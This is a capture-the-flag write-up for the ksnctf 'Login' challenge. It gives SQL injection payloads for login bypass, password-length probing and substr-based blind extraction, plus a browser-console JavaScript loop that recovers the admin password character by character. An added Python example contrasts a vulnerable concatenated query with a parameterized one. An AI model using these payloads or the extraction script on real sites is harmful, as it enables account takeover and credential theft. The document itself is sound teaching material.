@okwrtdsh
Last active February 3, 2019 19:29

ksnctf Login write-up

http://ksnctf.sweetduet.info/problem/6

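  1. The problem says to log in as admin, so start with a SQL injection. pass: `' OR 1=1;--`
  2. The response says that admin's password is the flag.
  3. Find the length of the password. pass: `' OR (SELECT length(pass) FROM user WHERE id='admin') < 22;--`
  4. The length turns out to be 21, so write some quick JS in the browser console.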
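  • Load jQuery

```javascript
var jq = document.createElement('script');
jq.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);
```

  • POST via ajax and record the character when "Congratulations" comes back

```javascript
// Responses arrive in arbitrary order, so store each hit by its position
// instead of appending to a string.
var flag = [];
var post = function(i, c){
  $.post(".", {id: "admin", pass: "' OR (SELECT substr (pass,"+i+",1) FROM user WHERE id='admin') = '"+c+"';--"})
    .done(function(data){
      if(data.includes("Congratulations")){flag[i-1]=c;console.log(i,c);}
    });
}
```

  • After that, just wait

```javascript
// Positions 1..21, candidate characters '0' (48) through 'z' (122)
for(var j=1;j<22;j++)for(var i=48;i<123;i++){post(j, String.fromCharCode(i))}
```

  5. flag

```javascript
console.log(flag.join(''));
```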
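The write-up does not show the server side. As an added example (not part of the original gist), the Python/sqlite3 code below assumes the login query is built by string concatenation, then replays the three payloads from the steps above against that form and against a parameterized form. The function names, the query shape and the sample password are assumptions; only the `user` table and its `id` and `pass` columns come from the payloads.

```python
import sqlite3

# Payloads quoted from the write-up; the substr guess 'F' matches the
# constructed sample password below, not the real flag.
PAYLOADS = {
    "bypass": "' OR 1=1;--",
    "length": "' OR (SELECT length(pass) FROM user WHERE id='admin') < 22;--",
    "substr": "' OR (SELECT substr (pass,1,1) FROM user WHERE id='admin') = 'F';--",
}
SAMPLE_PASS = "FLAG_constructed_0123"  # constructed, 21 characters


def make_db():
    """In-memory database with one constructed admin row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id TEXT, pass TEXT)")
    db.execute("INSERT INTO user VALUES ('admin', ?)", (SAMPLE_PASS,))
    return db


def login_vulnerable(db, user_id, password):
    """Assumed flawed form: user input becomes part of the SQL text."""
    sql = "SELECT id FROM user WHERE id='%s' AND pass='%s'" % (user_id, password)
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed input is treated as a failed login


def login_parameterized(db, user_id, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT id FROM user WHERE id=? AND pass=?"
    return db.execute(sql, (user_id, password)).fetchone() is not None


def audit(login):
    """Return, per payload, whether the login function accepted it."""
    db = make_db()
    return {name: login(db, "admin", p) for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    print("vulnerable:   ", audit(login_vulnerable))
    print("parameterized:", audit(login_parameterized))
```

With bound parameters the "Congratulations" response no longer depends on attacker-controlled SQL, so both the login bypass and the true/false oracle used for character-by-character extraction disappear.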